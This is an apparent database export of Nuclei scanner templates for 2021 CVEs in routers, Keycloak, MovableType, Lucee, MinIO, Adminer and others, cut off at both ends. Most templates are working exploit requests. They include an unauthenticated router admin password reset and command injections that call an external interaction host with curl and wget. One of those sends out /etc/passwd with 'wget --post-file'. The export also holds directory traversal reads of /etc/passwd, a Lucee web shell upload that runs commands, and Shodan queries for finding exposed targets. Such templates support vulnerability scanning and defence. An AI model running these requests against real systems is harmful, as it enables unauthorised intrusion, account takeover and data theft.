'ftp_permission'\n - 'TEW-827DRU'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: password\n group: 1\n regex:\n - ''\n part: body\n# digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950", "hash": "b6132001226a7cb7d0b55afa94749804", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308266" }, "name": "CVE-2021-20158.yaml", "content": "id: CVE-2021-20158\n\ninfo:\n name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change\n author: gy741\n severity: critical\n description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.\n impact: |\n An attacker with authenticated access can gain unauthorized control over the affected device.\n remediation: |\n Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2021-54\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20150\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-20158\n cwe-id: CWE-306\n epss-score: 0.01211\n epss-percentile: 0.83754\n cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: trendnet\n product: tew-827dru_firmware\n shodan-query: http.html:\"TEW-827DRU\"\n tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet\nvariables:\n password: \"{{rand_base(6)}}\"\n\nhttp:\n - raw:\n - |\n POST /apply_sec.cgi HTTP/1.1\n Host: {{Hostname}}\n\n 
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n - |\n POST /apply_sec.cgi HTTP/1.1\n Host: {{Hostname}}\n\n html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'setConnectDevice'\n - 'setInternet'\n - 'setWlanSSID'\n - 'TEW-827DRU'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022026f2cb4d546143dddc1646a081ebfaeecf087f82b9adc26ae239313b24dc4a4d0221008e2cbba77ac00dde9277de789229bd07830e4a7b7c25c58778ac3c9b1ddeddb9:922c64590222798bb761d5b6d8e72950", "hash": "12ea3e773f1180d3ca8b123cb70825b8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308267" }, "name": "CVE-2021-20167.yaml", "content": "id: CVE-2021-20167\n\ninfo:\n name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun\n author: gy741\n severity: high\n description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router contains a buffer overrun issue that can redirect the control flow of the application. 
Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'\n remediation: Upgrade to newer release of the RAX43 firmware.\n reference:\n - https://www.tenable.com/security/research/tra-2021-55\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20166\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20167\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8\n cve-id: CVE-2021-20167\n cwe-id: CWE-77\n epss-score: 0.94822\n epss-percentile: 0.99222\n cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: rax43_firmware\n tags: cve2021,cve,tenable,netgear,rce,router\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\n Host: {{Hostname}}\n\n \"name\":\"';$(curl {{interactsh-url}});'\",\n \"email\":\"a@b.c\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4b0a00483046022100a120fefbb36e69c70d4665614d7579e6da2abee8955d5686ba345bf0c8600bdb022100eb3394e9cd130d5934476c1186acd108ebc7cf70016720dc85dc8f8275b2e246:922c64590222798bb761d5b6d8e72950", "hash": "594c29aa7963a30be1d34355fc351a4a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308268" }, "name": "CVE-2021-20323.yaml", "content": "id: CVE-2021-20323\n\ninfo:\n name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting\n author: ndmalc,incogbyte\n severity: medium\n description: |\n Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting 
vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/html. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher).\n reference:\n - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j\n - https://bugzilla.redhat.com/show_bug.cgi?id=2013577\n - https://access.redhat.com/security/cve/CVE-2021-20323\n - https://github.com/ndmalc/CVE-2021-20323\n - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20323\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-20323\n cwe-id: CWE-79\n epss-score: 0.00173\n epss-percentile: 0.53461\n cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: redhat\n product: keycloak\n shodan-query: html:\"Keycloak\"\n tags: cve2021,cve,keycloak,xss,redhat\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/auth/realms/master/clients-registrations/default\"\n - \"{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect\"\n - \"{{BaseURL}}/realms/master/clients-registrations/default\"\n - \"{{BaseURL}}/realms/master/clients-registrations/openid-connect\"\n\n body: \"{\\\"Test\\\":1}\"\n stop-at-first-match: true\n\n headers:\n 
Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Unrecognized field \"Test'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 400\n# digest: 4a0a0047304502210094de0f55e8db0485dedb6be0b0faaa6737f8e5b40905c4c59b87598da6efa7c502203624957dc717497acf2a1ab8c0aee02060f4b9fc6fd22b24111abb850f2b07ab:922c64590222798bb761d5b6d8e72950", "hash": "8927ca6d8e658e7d0abe702550d13565", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308269" }, "name": "CVE-2021-20792.yaml", "content": "id: CVE-2021-20792\n\ninfo:\n name: WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of WordPress Quiz and Survey Master plugin (7.1.14) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf\n - https://quizandsurveymaster.com/\n - https://jvn.jp/en/jp/JVN65388002/index.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20792\n - https://plugins.trac.wordpress.org/changeset?new=2503364%40quiz-master-next%2Ftrunk%2Fphp%2Fadmin%2Fquizzes-page.php&old=2490516%40quiz-master-next%2Ftrunk%2Fphp%2Fadmin%2Fquizzes-page.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-20792\n cwe-id: CWE-79\n epss-score: 0.00183\n epss-percentile: 0.54675\n cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n 
vendor: expresstech\n product: quiz_and_survey_master\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,authenticated,wpscan,expresstech\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=mlw_quiz_list&s=\">&paged=\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220278c989b9dc1803a0640da64a5a9b5d1f8dc007e0d7b724e3218b431ffc98f2f022100f203b37e7d96545de9a199b34f1bab451c9ec9b3825d84d3ff9db7e9c3694bcd:922c64590222798bb761d5b6d8e72950", "hash": "a30c90fc93ad6d99113a69c57faca516", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826a" }, "name": "CVE-2021-20837.yaml", "content": "id: CVE-2021-20837\n\ninfo:\n name: MovableType - Remote Command Injection\n author: dhiyaneshDK,hackergautam\n severity: critical\n description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 
2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType.\n reference:\n - https://nemesis.sh/posts/movable-type-0day/\n - https://github.com/ghost-nemesis/cve-2021-20837-poc\n - https://twitter.com/cyber_advising/status/1454051725904580608\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20837\n - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-20837\n cwe-id: CWE-78\n epss-score: 0.96998\n epss-percentile: 0.99689\n cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:*\n metadata:\n max-request: 1\n vendor: sixapart\n product: movable_type\n tags: cve2021,cve,packetstorm,rce,movable,sixapart\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n mt.handler_to_coderef\n \n \n \n \n {{base64(\"`wget http://{{interactsh-url}}`\")}}\n \n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n words:\n - \"failed loading package\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d0675892f5cec9c4449982110497fde27efa75037b1885e51f4b4dcf0340a1db022100c191c1f76092756f549a6f2692918433952d4d0a25a3c7f4833c36650fa39e9d:922c64590222798bb761d5b6d8e72950", "hash": "92a08a2eb08ed5db1537a43ebe584a52", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf30826b" }, "name": "CVE-2021-21087.yaml", "content": "id: CVE-2021-21087\n\ninfo:\n name: Adobe ColdFusion - Cross-Site Scripting\n author: Daviey\n severity: medium\n description: |\n Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Adobe to mitigate this vulnerability.\n reference:\n - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html\n - https://twitter.com/Daviey/status/1374070630283415558\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21087\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-21087\n cwe-id: CWE-79\n epss-score: 0.00186\n epss-percentile: 0.54967\n cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:*\n metadata:\n max-request: 7\n vendor: adobe\n product: coldfusion\n shodan-query: http.component:\"Adobe ColdFusion\"\n tags: cve2021,cve,xss,adobe,misc,coldfusion\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js\"\n - 
\"{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js\"\n - \"{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - 'eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a8a85ba3feb3fc5625cd71d82087d10be42d642fd896fd5f96a35a9272ddff9402200a01ef82246294f6757e64c15356058aa6d3fc266364ca44ea705b2258a34ca5:922c64590222798bb761d5b6d8e72950", "hash": "dbea2b64b3a3bdacfcdf817d8a85e1f8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826c" }, "name": "CVE-2021-21234.yaml", "content": "id: CVE-2021-21234\n\ninfo:\n name: Spring Boot Actuator Logview Directory Traversal\n author: gy741,pikpikcu\n severity: high\n description: |\n spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in a library that adds a simple logfile viewer as a spring boot actuator endpoint (maven package \"eu.hinsch:spring-boot-actuator-logview\").\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information stored on the server.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Spring Boot Actuator.\n reference:\n - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234\n - https://github.com/cristianeph/vulnerability-actuator-log-viewer\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21234\n - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/760acbb939a8d1f7d1a7dfcd51ca848eea04e772\n - https://github.com/lukashinsch/spring-boot-actuator-logview/commit/1c76e1ec3588c9f39e1a94bf27b5ff56eb8b17d6\n - https://blog.csdn.net/qq_39583774/article/details/123023770#t5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2021-21234\n cwe-id: CWE-22\n 
epss-score: 0.96798\n epss-percentile: 0.99621\n cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: spring-boot-actuator-logview_project\n product: spring-boot-actuator-logview\n tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../\"\n - \"{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../\"\n - \"{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../\"\n - \"{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"contains(header,'text/plain')\"\n - \"regex('root:.*:0:0:', body)\"\n - \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(header,'text/plain')\"\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n condition: and\n# digest: 490a00463044022033ebb435f1795b6a06bd29b9bee7de4e687a08dc848035c641304f25a05044420220421167babce74e7aa10b543e135d291d7ec87aeacc8ca03950f34bd210e9ea7a:922c64590222798bb761d5b6d8e72950", "hash": "1a77cb7e6eeee4e7c3799219074dc4bf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826d" }, "name": "CVE-2021-21287.yaml", "content": "id: CVE-2021-21287\n\ninfo:\n name: MinIO Browser API - Server-Side Request Forgery\n author: pikpikcu\n severity: high\n description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage.\n 
remediation: |\n Apply the latest security patches or updates provided by MinIO to fix this vulnerability.\n reference:\n - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q\n - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html\n - https://github.com/minio/minio/pull/11337\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21287\n - https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2021-21287\n cwe-id: CWE-918\n epss-score: 0.97112\n epss-percentile: 0.99745\n cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: minio\n product: minio\n tags: cve,cve2021,minio,ssrf,oast\n\nhttp:\n - raw:\n - |\n POST /minio/webrpc HTTP/1.1\n Host: {{interactsh-url}}\n Content-Type: application/json\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\n Content-Length: 76\n\n {\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\": \"Test\"},\"method\":\"web.LoginSTS\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\" # Confirms the HTTP Interaction\n\n - type: word\n words:\n - \"We encountered an internal error\"\n# digest: 490a004630440220193a42a5351b971d266989af20781c196488aca759067dbc1f0e8f2308d5c64802206f9ed4e250e668bc8a8acae05ca9632ea520a07ef3eca8bee272b8bdd6cc44bf:922c64590222798bb761d5b6d8e72950", "hash": "078ba2dcb443d3f916dc5ac2e1d75c4b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826e" }, "name": "CVE-2021-21307.yaml", "content": "id: CVE-2021-21307\n\ninfo:\n name: Lucee Admin - Remote Code Execution\n author: dhiyaneshDk\n severity: critical\n description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code 
execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.\n reference:\n - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r\n - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21307\n - http://ciacfug.org/blog/updating-lucee-as-part-of-a-vulnerability-alert-response\n - https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020/7643\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21307\n cwe-id: CWE-862\n epss-score: 0.97312\n epss-percentile: 0.99864\n cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: lucee\n product: lucee_server\n tags: cve2021,cve,rce,lucee,adobe\n\nhttp:\n - raw:\n - |\n POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n imgSrc=a\n - |\n POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n imgSrc=\n \n\n \n \n \n \n \n
    Command:value=\"#form.cmd#\">
    Options: value=\"#form.opts#\">
    Timeout: value=\"#form.timeout#\"\n value=\"5\">
    \n \n \n \n \n \n \n \n
    \n      # HTMLCodeFormat(myVar)# 
    \n - |\n POST /lucee/{{randstr}}.cfm HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Content-Type: application/x-www-form-urlencoded\n\n cmd=id&opts=&timeout=5\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"uid=\"\n - \"gid=\"\n - \"groups=\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"(u|g)id=.*\"\n# digest: 4b0a00483046022100dcc24fb2eb777eff956bdecff0f00a86f51d0137fee0f7436e9a61d975a3f83d022100d09f18044914a741d17e4d1c9f15f0c229d19093066f6e7ee379376d585ed0ea:922c64590222798bb761d5b6d8e72950", "hash": "249d6de56aa2417054ea07f24a445727", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30826f" }, "name": "CVE-2021-21311.yaml", "content": "id: CVE-2021-21311\n\ninfo:\n name: Adminer <4.7.9 - Server-Side Request Forgery\n author: Adam Crosser,pwnhxl\n severity: high\n description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. 
An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.\n remediation: Upgrade to version 4.7.9 or later.\n reference:\n - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6\n - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf\n - https://packagist.org/packages/vrana/adminer\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21311\n - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cve-id: CVE-2021-21311\n cwe-id: CWE-918\n epss-score: 0.01485\n epss-percentile: 0.85417\n cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 6\n vendor: adminer\n product: adminer\n shodan-query: title:\"Login - Adminer\"\n fofa-query: app=\"Adminer\" && body=\"4.7.8\"\n hunter-query: app.name=\"Adminer\"&&web.body=\"4.7.8\"\n tags: cve2021,cve,adminer,ssrf\n\nhttp:\n - raw:\n - |\n POST {{path}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n\n payloads:\n path:\n - \"/index.php\"\n - \"/adminer.php\"\n - \"/adminer/adminer.php\"\n - \"/adminer/index.php\"\n - \"/_adminer.php\"\n - \"/_adminer/index.php\"\n\n attack: batteringram\n stop-at-first-match: true\n redirects: true\n max-redirects: 1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"400 - Bad Request\"\n - \"<title>400 - Bad Request</title>\"\n condition: or\n\n - type: status\n status:\n - 403\n# digest: 
4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950", "hash": "cfb4bace0cc706f2e0d72b682cce0f0a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308270" }, "name": "CVE-2021-21315.yaml", "content": "id: CVE-2021-21315\n\ninfo:\n name: Node.JS System Information Library <5.3.1 - Remote Command Injection\n author: pikpikcu\n severity: high\n description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package \"systeminformation\") is an open source collection of functions to retrieve detailed hardware, system and OS information.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. 
String sanitation works as expected\n reference:\n - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC\n - https://security.netapp.com/advisory/ntap-20210312-0007/\n - https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v\n - https://www.npmjs.com/package/systeminformation\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21315\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2021-21315\n cwe-id: CWE-78\n epss-score: 0.97233\n epss-percentile: 0.99827\n cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: systeminformation\n product: systeminformation\n framework: node.js\n tags: cve,cve2021,nodejs,kev,systeminformation,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"wget --post-file /etc/passwd {{interactsh-url}}\"\n - name\n - running\n - pids\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200c1047dcc90c189900f05fb35827af9ae07e546fd18b576cdf2fab02e506f6b4022100adf613b9c43079b8e63825c8282c41fd892e632b5fd81854a70bd1737ca542c1:922c64590222798bb761d5b6d8e72950", "hash": "6d8769d6f5edcf5b5e8aff7281231dad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308271" }, "name": "CVE-2021-21345.yaml", "content": "id: CVE-2021-21345\n\ninfo:\n name: XStream <1.4.16 - Remote Code Execution\n author: pwnhxl,vicrack\n severity: critical\n description: |\n XStream before 1.4.16 is susceptible to remote code execution. 
An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.\n reference:\n - https://x-stream.github.io/CVE-2021-21345.html\n - http://x-stream.github.io/changes.html#1.4.16\n - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21345\n - https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9.9\n cve-id: CVE-2021-21345\n cwe-id: CWE-78,CWE-502\n epss-score: 0.4876\n epss-percentile: 0.9721\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: 